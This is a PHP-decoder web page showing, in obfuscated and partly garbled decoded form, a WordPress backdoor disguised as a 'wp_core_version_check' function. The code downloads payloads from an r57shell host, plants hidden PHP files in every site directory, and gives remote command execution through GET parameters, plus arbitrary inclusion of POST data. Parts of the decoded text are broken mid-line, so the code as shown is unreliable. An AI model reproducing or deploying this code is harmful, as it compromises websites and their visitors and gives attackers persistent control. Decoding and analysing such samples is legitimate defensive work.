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PHP Decode
eval('?>'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));?><?php if (!function_e..
Decoded Output download
<? eval('?>'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));?><?php
if (!function_exists("wp_core_versio\
x6e_check")) { function wp_core_version_check() { goto QHTmE;
ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file =
TmK7C; B8IHf: $uri_path = $parse_url["path"]; goto DR8d0; TmK7C: $re
quest_uri = $_SERVER["REQUEST_URI"]; goto Lhccs
; Sae33: $hostname = str_replace("www.", '', $_SERVER["HTT\1
20_HOST"]); goto EmUwt; yxZ6i: $uri_path = str_replace("/", DI
RECTORY_SEPARATOR, $uri_path); goto TMxaR; O4NxR: if (!file_exists($tmp_file)) {
goto Jjyr3; qVUcF: @touch($tmp_file); goto FrbfO; FrbfO: @file_put_contents($tm
p_file, $response); goto fUkP_; Jjyr3: if (function_exists("curl_
init")) { goto EZy_9; EZy_9: $ch = curl_init(); goto VR0Vi; OFlqh: c
url_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VdcLO; VR0Vi: curl_setopt($ch,
CURLOPT_URL, "http://r57shell.n\
equest=enable"); goto OFlqh; DcJlW: $respo
nse = curl_exec($ch); goto fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SER
T_URI"]); goto DcJlW; fkRwe: curl_close($ch); goto MpMm6; MpMm6:
} else { goto Rsl9q; PQRsR: $response = @file_get_contents("http:
eable", false, $context); goto NXRla; DmscO: $context = stream_conte
xt_create($opts); goto PQRsR; Rsl9q: $referer = $_SERVER["HTTP_\x
48OST"] . $_SERVER["REQUEST_URI"]; got
o vGpwe; vGpwe: $opts = array("http" => array("heade\
162" => array("Referer: {$referer}
\xa"))); goto Dmsc
O; NXRla: } goto qVUcF; fUkP_: } else { $response = file_get_contents($tmp_file)
; if (!@preg_match("#stt1#", $response)) { goto Mh1sz; Mh1sz: if
(function_exists("curl_init")) { goto DVDkP; u_SFh:
$response = curl_exec($ch); goto zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "\1
t=enable"); goto AvWVd; YWAQw: curl_setopt($ch, CURLOPT_
51UEST_URI"]); goto u_SFh; DVDkP: $ch = curl_init(); got
o zMTgu; zDHcZ: curl_close($ch); goto v98go; AvWVd: curl_setopt($ch, CURLOPT_RET
URNTRANSFER, 1); goto YWAQw; v98go: } else { goto JGb71; Npbn0: $opts = array("\
150ttp" => array("header" => array("Refe\
162er: {$referer}
\xa"))); goto dtUcU; JGb71: $referer = $_SERVER["\
5fURI"]; goto Npbn0; hCspz: $response = @file_get_contents("ht\x7
65nable", false, $context); goto XWjW4; dtUcU: $context = stream_
context_create($opts); goto hCspz; XWjW4: } goto zkCQa; zkCQa: @touch($tmp_file)
; goto RL2uX; RL2uX: @file_put_contents($tmp_file, $response); goto Fx07H; Fx07H
: } } goto BXZRC; EmUwt: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_
get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostna
me . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_
SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_fil
e . ''); } goto jUXuO; DR8d0: $uri_path = dirname($uri_path); goto ReBbR; QCYq2:
foreach ($dirs as $d) { goto DpqP9; eMOLH: @file_put_contents($file_name, $resp
onse); goto xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "
*", GLOB_ONLYDIR)); goto KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR
. "." . basename($d) . ".php"; goto eMOLH; KHsZ5: foreach ($dirs a
s $d) { if (!@preg_match("#wp-content#", $d)) {
$file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php
"; @file_put_contents($file_name, $response); } } goto vTd8M; vTd8M: } goto VCwm
6; jUXuO: if (@$_GET["slince_golden"]) {
goto qhIqa; v6_uU: if (md5(sha1(@$_GET["is"])) == $response) { goto LNCgX;
LNCgX: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto mNwU
E; mNwUE: if (@$_GET["m"]) { goto u3lO9; u3lO9: if (function_exists("cu
rl_init")) { goto h0059; nzFPK: curl_setopt($ch, CURLOPT_UR
L, "
mini_admin.txt"); goto SlTBv; SMEF2: cu
rl_close($ch); goto nxTNz; h0059: $ch = curl_init(); goto nzFPK; SlTBv: curl_set
opt($ch, CURLOPT_RETURNTRANSFER, 1); goto cerjF; cerjF: $response = curl_exec($c
h); goto SMEF2; nxTNz: } else { $response = file_get_contents("http\
41dmin.txt"); } goto VIyGz; oeY1g: echo $file_name_path;
goto UXu2c; VIyGz: $file_name_path = @$_GET["m"] . "gagal.
php"; goto xhRaG; xhRaG: @file_put_contents($file_name_path, $response)
; goto oeY1g; UXu2c: } goto jKG5A; jKG5A: if (@$_POST["l"]) { function basic_
code_extensions($request) { goto JTclu; tgcIK: $tmpf = $tmpf["uri"]; go
to z3rep; vnQ75: $ret = (include $tmpf); goto Cvaad; JTclu: $tmp = tmpfile(); go
to ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp); goto tgcIK; z3rep: fwrite($
tmp, $request); goto vnQ75; aY2Ix: return $ret; goto hdvh2; Cvaad: fclose($tmp);
goto aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["l"])); } goto ZFc
wP; ZFcwP: } goto OlWFN; OlWFN: exit; goto vQOuT; qhIqa: echo "<!-- \
x2f/Silence is golden.
-->"; goto q9t4S; q9t4S: if (function_exists("curl_i\1
56it")) { goto P3bql; sk_2w: curl_close($ch); goto j1BU_; P3bql: $ch = cur
l_init(); goto FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "http:\
56php?v=1.2&pwd=get"); goto XAilZ
; AJz_6: $response = curl_exec($ch); goto sk_2w; XAilZ: curl_setopt($ch, CURLOPT
_RETURNTRANSFER, 1); goto AJz_6; j1BU_: } else { $response = file_get_contents("
7et"); } goto v6_uU; vQOuT: } goto O4NxR; TMxaR: if ($uri_path == DIRECTOR
Y_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $documen
t_root = str_replace($uri_path, '', $file_path); } goto Sae33; BXZRC: $dirs = ar
ray_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); g
oto QCYq2; Lhccs: $parse_url = parse_url($request_uri); goto B8IHf; VCwm6: } wp_
core_version_check(); }
Did this file decode correctly?
Original Code
if (!function_exists("\x77\160\137\143\x6f\x72\145\x5f\166\145\162\163\151\x6f\
x6e\x5f\143\150\x65\x63\x6b")) { function wp_core_version_check() { goto QHTmE;
ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file =
$_SERVER["\123\x43\x52\111\x50\124\x5f\106\111\114\x45\x4e\x41\115\105"]; goto
TmK7C; B8IHf: $uri_path = $parse_url["\x70\x61\x74\150"]; goto DR8d0; TmK7C: $re
quest_uri = $_SERVER["\x52\105\x51\x55\105\123\124\x5f\x55\122\x49"]; goto Lhccs
; Sae33: $hostname = str_replace("\167\167\x77\56", '', $_SERVER["\110\124\x54\1
20\137\x48\x4f\x53\x54"]); goto EmUwt; yxZ6i: $uri_path = str_replace("\x2f", DI
RECTORY_SEPARATOR, $uri_path); goto TMxaR; O4NxR: if (!file_exists($tmp_file)) {
goto Jjyr3; qVUcF: @touch($tmp_file); goto FrbfO; FrbfO: @file_put_contents($tm
p_file, $response); goto fUkP_; Jjyr3: if (function_exists("\143\165\162\154\137
\x69\x6e\x69\x74")) { goto EZy_9; EZy_9: $ch = curl_init(); goto VR0Vi; OFlqh: c
url_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VdcLO; VR0Vi: curl_setopt($ch,
CURLOPT_URL, "\x68\x74\x74\160\72\57\x2f\x72\x35\67\163\x68\145\x6c\154\x2e\156\
\145\161\x75\x65\163\x74\75\145\156\141\142\x6c\x65"); goto OFlqh; DcJlW: $respo
nse = curl_exec($ch); goto fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SER
VER["\110\124\124\x50\x5f\x48\x4f\x53\124"] . $_SERVER["\x52\105\x51\x55\x45\x53
\x54\137\x55\x52\111"]); goto DcJlW; fkRwe: curl_close($ch); goto MpMm6; MpMm6:
} else { goto Rsl9q; PQRsR: $response = @file_get_contents("\150\x74\x74\x70\x3a
e\141\142\154\145", false, $context); goto NXRla; DmscO: $context = stream_conte
xt_create($opts); goto PQRsR; Rsl9q: $referer = $_SERVER["\110\x54\124\x50\x5f\x
48\x4f\123\124"] . $_SERVER["\x52\x45\x51\x55\105\123\124\x5f\x55\122\111"]; got
o vGpwe; vGpwe: $opts = array("\150\x74\164\160" => array("\x68\x65\141\144\145\
162" => array("\122\x65\x66\x65\x72\x65\162\72\40{$referer}\15\xa"))); goto Dmsc
O; NXRla: } goto qVUcF; fUkP_: } else { $response = file_get_contents($tmp_file)
; if (!@preg_match("\43\163\164\x74\61\x23", $response)) { goto Mh1sz; Mh1sz: if
(function_exists("\143\x75\162\154\137\151\156\x69\164")) { goto DVDkP; u_SFh:
$response = curl_exec($ch); goto zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "\1
\x74\x3d\145\x6e\x61\142\x6c\x65"); goto AvWVd; YWAQw: curl_setopt($ch, CURLOPT_
REFERER, $_SERVER["\x48\124\124\120\137\110\x4f\x53\124"] . $_SERVER["\122\105\x
51\x55\105\x53\124\x5f\x55\122\111"]); goto u_SFh; DVDkP: $ch = curl_init(); got
o zMTgu; zDHcZ: curl_close($ch); goto v98go; AvWVd: curl_setopt($ch, CURLOPT_RET
URNTRANSFER, 1); goto YWAQw; v98go: } else { goto JGb71; Npbn0: $opts = array("\
150\164\164\160" => array("\150\145\141\x64\145\x72" => array("\122\145\146\145\
162\145\162\72\40{$referer}\15\xa"))); goto dtUcU; JGb71: $referer = $_SERVER["\
110\124\124\x50\137\x48\x4f\x53\x54"] . $_SERVER["\122\x45\121\125\105\x53\x54\x
5f\125\x52\111"]; goto Npbn0; hCspz: $response = @file_get_contents("\150\x74\x7
65\156\x61\x62\154\145", false, $context); goto XWjW4; dtUcU: $context = stream_
context_create($opts); goto hCspz; XWjW4: } goto zkCQa; zkCQa: @touch($tmp_file)
; goto RL2uX; RL2uX: @file_put_contents($tmp_file, $response); goto Fx07H; Fx07H
: } } goto BXZRC; EmUwt: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_
get_temp_dir() . DIRECTORY_SEPARATOR . "\x73\145\x73\163\x5f" . md5('' . $hostna
me . "\x5f" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_
SEPARATOR . "\163\x65\163\163\137" . md5('' . $hostname . "\x5f" . $document_fil
e . ''); } goto jUXuO; DR8d0: $uri_path = dirname($uri_path); goto ReBbR; QCYq2:
foreach ($dirs as $d) { goto DpqP9; eMOLH: @file_put_contents($file_name, $resp
onse); goto xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "
\x2a", GLOB_ONLYDIR)); goto KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR
. "\x2e" . basename($d) . "\56\160\150\160"; goto eMOLH; KHsZ5: foreach ($dirs a
s $d) { if (!@preg_match("\43\167\x70\55\x63\157\x6e\x74\145\x6e\x74\43", $d)) {
$file_name = $d . DIRECTORY_SEPARATOR . "\56" . basename($d) . "\56\x70\x68\160
"; @file_put_contents($file_name, $response); } } goto vTd8M; vTd8M: } goto VCwm
6; jUXuO: if (@$_GET["\163\x6c\x69\156\x63\145\x5f\x67\x6f\154\144\x65\x6e"]) {
goto qhIqa; v6_uU: if (md5(sha1(@$_GET["\151\163"])) == $response) { goto LNCgX;
LNCgX: if (@$_GET["\146"]) { print_r($_GET["\x66"]($_GET["\x63"])); } goto mNwU
E; mNwUE: if (@$_GET["\x6d"]) { goto u3lO9; u3lO9: if (function_exists("\x63\x75
\162\154\x5f\151\x6e\x69\x74")) { goto h0059; nzFPK: curl_setopt($ch, CURLOPT_UR
L, "\150\164\164\x70\72\57\x2f\x72\x35\67\x73\x68\x65\x6c\x6c\56\156\x65\x74\x2f
\155\151\x6e\151\137\141\144\155\151\x6e\56\164\x78\164"); goto SlTBv; SMEF2: cu
rl_close($ch); goto nxTNz; h0059: $ch = curl_init(); goto nzFPK; SlTBv: curl_set
opt($ch, CURLOPT_RETURNTRANSFER, 1); goto cerjF; cerjF: $response = curl_exec($c
h); goto SMEF2; nxTNz: } else { $response = file_get_contents("\x68\x74\x74\160\
41\144\155\151\x6e\x2e\x74\x78\164"); } goto VIyGz; oeY1g: echo $file_name_path;
goto UXu2c; VIyGz: $file_name_path = @$_GET["\155"] . "\147\x61\x67\141\154\x2e
\x70\150\160"; goto xhRaG; xhRaG: @file_put_contents($file_name_path, $response)
; goto oeY1g; UXu2c: } goto jKG5A; jKG5A: if (@$_POST["\x6c"]) { function basic_
code_extensions($request) { goto JTclu; tgcIK: $tmpf = $tmpf["\165\x72\x69"]; go
to z3rep; vnQ75: $ret = (include $tmpf); goto Cvaad; JTclu: $tmp = tmpfile(); go
to ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp); goto tgcIK; z3rep: fwrite($
tmp, $request); goto vnQ75; aY2Ix: return $ret; goto hdvh2; Cvaad: fclose($tmp);
goto aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["\154"])); } goto ZFc
wP; ZFcwP: } goto OlWFN; OlWFN: exit; goto vQOuT; qhIqa: echo "\74\41\x2d\55\40\
\55\x2d\x3e"; goto q9t4S; q9t4S: if (function_exists("\x63\165\162\154\x5f\x69\1
56\x69\164")) { goto P3bql; sk_2w: curl_close($ch); goto j1BU_; P3bql: $ch = cur
l_init(); goto FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "\150\x74\164\160\72\
56\160\150\x70\77\x76\x3d\61\x2e\x32\46\160\167\x64\75\x67\x65\x74"); goto XAilZ
; AJz_6: $response = curl_exec($ch); goto sk_2w; XAilZ: curl_setopt($ch, CURLOPT
_RETURNTRANSFER, 1); goto AJz_6; j1BU_: } else { $response = file_get_contents("
7\145\x74"); } goto v6_uU; vQOuT: } goto O4NxR; TMxaR: if ($uri_path == DIRECTOR
Y_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $documen
t_root = str_replace($uri_path, '', $file_path); } goto Sae33; BXZRC: $dirs = ar
ray_filter(glob($document_root . DIRECTORY_SEPARATOR . "\x2a", GLOB_ONLYDIR)); g
oto QCYq2; Lhccs: $parse_url = parse_url($request_uri); goto B8IHf; VCwm6: } wp_
core_version_check(); }
Function Calls
None |
MD5 | e7014ad6fb6d1976d77d5ac8c2e7b04a |
Eval Count | 0 |
Decode Time | 38 ms |